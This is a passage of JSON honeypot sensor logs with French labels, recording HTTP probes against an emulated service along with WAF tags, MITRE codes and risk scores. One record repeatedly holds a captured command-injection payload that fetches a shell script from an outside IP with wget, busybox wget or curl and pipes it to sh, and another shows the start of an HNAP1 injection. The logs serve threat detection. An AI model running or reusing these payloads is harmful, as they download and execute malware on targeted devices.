\u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002244a2e9583387743be0097ea44dbbdf9a\u0022, \u0022path_pattern_hash\u0022: \u0022f6e9baaa731f11923b2ba9541a8713d5\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 46}, \u0022payload_preview\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection:\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection:\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00222100bf4a1bb2ff75d1d9fe828db7923a33f07cc9\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection:\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 97 % \u2014 5 signal(aux) capteur\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 46\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 97 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 97, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 46}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 46, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022], \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection:\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 97 % \u2014 5 signal(aux) capteur\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 97 % \u2014 Score WAF 8\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":138},{"id":11809680,"ip":"45.153.34.252","ts":"2026-07-14 02:29:38.000000","proto":"tcp","src_port":38118,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":53,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002216d873425a44abcbc561dbf80ce01723ad77c248\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 262, \u0022payload_entropy\u0022: 5.048511930322051, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022c3f9f71a2f7fb695bce3d57a284add7c86758d8e\u0022, \u0022event_fingerprint\u0022: \u0022a04b864070ff8266aca0a8bda1d693ef26876c47\u0022, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00227a21557bba27bb92fd75be0b8d4ae9b7\u0022, \u0022path_pattern_hash\u0022: \u00227b027b43ee202e99587271c9aa97af77\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022query_string\u0022: \u0022cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022query_string\u0022: \u0022cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: clo\u0022, \u0022payload_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002256c240127695c0697e6d5b3e6eff99a3fcd22a78\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_config\u0022, \u0022http_scanner_params\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_config\u0022, \u0022http_scanner_params\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":262},{"id":11809681,"ip":"45.153.34.252","ts":"2026-07-14 02:29:38.000000","proto":"tcp","src_port":38132,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":54,"waf_tags":"[\u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950334:rce-2\u0022, \u0022950346:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022]","http_method":"GET","http_target":"\/HNAP1\/GetDeviceSettings\/`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002229a6cddf78878795feafd7a474d6be17135e91e6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 474, \u0022payload_entropy\u0022: 5.138260382692764, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 67, \u0022tag_count\u0022: 